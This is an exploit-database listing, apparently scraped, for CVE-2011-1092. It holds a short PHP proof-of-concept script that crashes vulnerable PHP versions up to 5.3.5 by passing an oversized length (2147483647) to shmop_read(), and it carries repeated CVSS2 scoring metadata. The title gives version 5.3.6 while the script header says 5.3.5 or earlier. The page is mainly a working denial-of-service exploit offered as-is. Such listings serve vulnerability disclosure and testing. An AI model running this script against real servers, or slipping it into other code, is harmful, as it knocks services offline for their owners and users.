Lucene search

K
exploitpackJose Carlos NorteEXPLOITPACK:73762C9D0D011D0F7F7CAA1D670C463F
HistoryMar 12, 2011 - 12:00 a.m.

PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service

2011-03-1200:00:00
Jose Carlos Norte
42

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service

<?php
# Exploit Title: PHP <=5.3.5 Integer Overflow DoS
# Date: 12-03-11
# Author: Jose Carlos Norte - www.rooibo.com
# Software Link: www.php.net
# Version: <= 5.3.5
# Tested on: Ubuntu Linux
# CVE : CVE-2011-1092

$shm_key = ftok(__FILE__, 't');
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of memory!
//or we are in a patched php
echo "this php version is not vulnerable!";

?>

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P